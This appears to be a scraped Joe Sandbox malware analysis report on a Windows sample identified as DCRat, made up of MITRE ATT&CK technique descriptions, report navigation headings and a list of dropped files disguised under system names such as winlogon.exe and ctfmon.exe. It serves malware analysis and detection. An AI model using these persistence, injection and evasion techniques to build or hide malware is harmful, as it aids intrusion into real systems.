Source: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe	Queries volume information: C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\QeWHGGzCXwoQygZUiDI.exe VolumeInformation
Source: C:\Program Files\Windows Mail\ctfmon.exe	Queries volume information: C:\Program Files\Windows Mail\ctfmon.exe VolumeInformation

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report B9exXW7c3t.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\Common Files\System\msadc\en-US\cc11b995f2a76d

C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe

C:\Program Files\Common Files\System\msadc\en-US\winlogon.exe:Zone.Identifier

C:\Program Files\Microsoft\OneDrive\ListSync\2e26acd4fd0504

C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe

C:\Program Files\Microsoft\OneDrive\ListSync\QeWHGGzCXwoQygZUiDI.exe:Zone.Identifier

C:\Program Files\Windows Mail\26c12092da979c

C:\Program Files\Windows Mail\ctfmon.exe

C:\Program Files\Windows Mail\ctfmon.exe:Zone.Identifier

C:\Users\Default\Links\6dd19aba3e2428

C:\Users\Default\Links\ApplicationFrameHost.exe

C:\Users\Default\Links\ApplicationFrameHost.exe:Zone.Identifier

C:\Users\Default\Saved Games\2e26acd4fd0504

C:\Users\Default\Saved Games\QeWHGGzCXwoQygZUiDI.exe

Windows Analysis Report
B9exXW7c3t.exe

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre